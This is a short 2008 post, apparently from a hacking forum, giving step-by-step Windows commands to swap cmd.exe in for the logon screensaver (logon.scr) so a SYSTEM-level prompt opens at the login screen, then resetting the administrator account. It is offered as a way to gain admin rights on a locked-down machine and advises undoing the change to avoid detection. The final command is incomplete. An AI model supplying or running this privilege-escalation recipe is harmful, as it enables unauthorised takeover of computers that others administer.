20 December 2008

Admin Access in a locked Environment!!!

This is straight for a brain child. It makes so much sense that no one ever thought
to do it.
Enjoy. Also beware to change what you have done. Or any machine that you did the
hack on will
show what you did when the screen saver comes up. The only hard part is finding your
way to C:\prompt or ms-dos. So begin.

If you can log in as an account , drop to DOS start -> run -> cmd, at the C: prompt
type the following (assuming default install locations)

C:\> cd \winnt\system32
C:\winnt\system32> copy logon.scr logon.scr.old
C:\winnt\system32> del logon.scr
C:\winnt\system32> copy cmd.exe logon.scr

Now log off the machine, logon.scr is the screen saver that will kick in after 15
minutes of not touching the keyboard/mouse at the logon screen. Wait 15-20 minutes
and a DOS prompt with FULL SYSTEM rights will pop up, then just to
C:\> net user administrator
and then log in with the new account.

Try this, might work, as long as he didn't change default permissions on C:\winnt
and C:\winnt\system32 you should be golden.